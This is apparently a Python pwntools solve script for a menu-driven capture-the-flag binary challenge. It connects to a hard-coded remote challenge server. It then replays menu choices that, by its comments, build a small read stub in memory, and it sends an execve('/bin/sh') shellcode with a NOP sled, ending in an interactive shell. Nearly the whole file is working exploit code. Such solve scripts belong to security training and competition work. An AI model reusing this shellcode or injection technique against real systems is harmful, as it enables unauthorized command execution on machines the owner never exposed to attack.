#!/usr/bin/python3
# Solve script for a menu-driven pwn challenge. It replays a fixed sequence of
# numeric menu choices over the socket and then submits a shellcode payload.
# The meaning of each menu option lives in ./challenge, not in this file, so
# the per-option comments below are the author's expectations, not facts
# verifiable from here.

from pwn import *

# Load the local binary so pwntools sets context.arch (used by asm() below);
# checksec=False only suppresses the security-property printout.
context.binary = target = ELF("./challenge", checksec=False)
# Local alternative kept for debugging; swap with the remote() line below.
# r = process()
# Remote instance for this event; host/port are event-specific.
r = remote("94.72.112.248", 1243)

# funcs
s = lambda a: r.sendline(a)      # send one menu choice (newline appended by sendline)
inc = lambda: r.sendline(b"2")   # option 2 — presumably advances to the next slot; confirm against the binary

# read
# Each group below is a run of menu choices followed by inc(); the hex in the
# trailing comments records the byte value the author expects each group to
# leave behind. How options 3/4/5/6 map onto those values is not visible here.
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
s(b"4")
s(b"3")
s(b"5") # 89
inc()
for i in range(2): s(b"4")
for i in range(2): s(b"3")
for i in range(5): s(b"6")
s(b"5") # d6
inc()
for i in range(3): s(b"3")
s(b"5")
s(b"6") # 48
inc()
for i in range(4): s(b"3")
for i in range(6): s(b"6")
s(b"5") # 31
inc()
for i in range(2): s(b"4")
for i in range(3): s(b"6")
s(b"3")
s(b"5") # d2
inc()
for i in range(2): s(b"4")
for i in range(9): s(b"6")
for i in range(2): s(b"3")
s(b"5") # b2
inc()
for i in range(17): s(b"5") # ff
inc()
s(b"5") # 0f
inc()
for i in range(2): s(b"3")
s(b"5")
for i in range(6): s(b"6") # 05
# Option 7 — presumably leaves the menu and hands control to whatever the
# groups above produced; confirm against the binary.
s(b"7")

# execve
# Stage-two payload: 59 is SYS_execve on x86-64. The `[rsi+35]` offset assumes
# rsi points at the start of this payload on entry; 35 appears to be the
# 16-byte NOP sled plus the assembled stub length, so that rdi lands on the
# trailing "/bin/sh" string. Re-check the offset if either part changes.
sc = """
lea rdi, [rsi+35]
xor rsi, rsi
xor rdx, rdx
mov rax, 59
syscall
"""
# Layout: NOP sled, assembled stub (arch taken from context.binary), then the
# NUL-terminated path string the lea above points at.
sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
s(sc)

# Hand the connection to the operator once the payload has been sent.
r.interactive()